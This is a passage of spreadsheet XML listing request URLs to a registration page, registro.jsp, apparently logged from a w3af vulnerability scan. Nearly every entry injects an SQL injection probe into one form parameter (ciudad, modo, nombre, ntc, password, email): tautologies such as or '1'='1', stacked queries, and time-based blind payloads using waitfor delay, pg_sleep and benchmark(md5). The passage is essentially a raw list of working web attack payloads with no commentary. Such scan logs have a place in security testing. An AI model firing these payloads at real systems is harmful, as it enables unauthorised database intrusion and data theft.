    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'));waitfor+delay+'0:0:5'--&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+benchmark(2500000,md5(1))&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1+or+pg_sleep(5)&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1'+or+pg_sleep(5)+or+'1'='1&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=1"+or+pg_sleep(5)+or+"1"="1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56&amp;email=w3af@email.com&amp;modo=registro"+or+"67"="67</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro"+and+"67"="68</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro'+or+'67'='67</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro'+and+'67'='68</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=55"+or+"55"="55&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=55"+and+"55"="56&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=55'+or+'55'='55&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=55'+and+'55'='56&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=55+or+55=55+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=55+and+55=56+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1;waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1);waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1';waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1');waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+benchmark(2500000,md5(1))&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+pg_sleep(5)&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+pg_sleep(5)+or+"1"="1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4"+or+"4"="4&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=4"+and+"4"="5&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=4'+or+'4'='4&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=4'+and+'4'='5&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=4+or+4=4+&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=4+and+4=5+&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1;waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1);waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1';waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1');waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+benchmark(2500000,md5(1))&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+pg_sleep(5)&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+pg_sleep(5)+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+pg_sleep(5)+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=55"+or+"55"="55&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=55"+and+"55"="56&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=55'+or+'55'='55&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=55'+and+'55'='56&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=55+or+55=55+&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=55+and+55=56+&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1;waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1);waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1));waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1';waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1');waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1'));waitfor+delay+'0:0:5'--&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1+or+benchmark(2500000,md5(1))&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1+or+pg_sleep(5)&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1'+or+pg_sleep(5)+or+'1'='1&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1"+or+pg_sleep(5)+or+"1"="1&amp;provincia=24&amp;login=56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56&amp;email=40"+or+"40"="40&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=40"+and+"40"="41&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=40'+or+'40'='40&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=40'+and+'40'='41&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=40+or+40=40+&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=40+and+40=41+&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1;waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1);waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1));waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1';waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1');waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'));waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+benchmark(2500000,md5(1))&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=24&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;modo=registro</t>
  </si>
  <si>
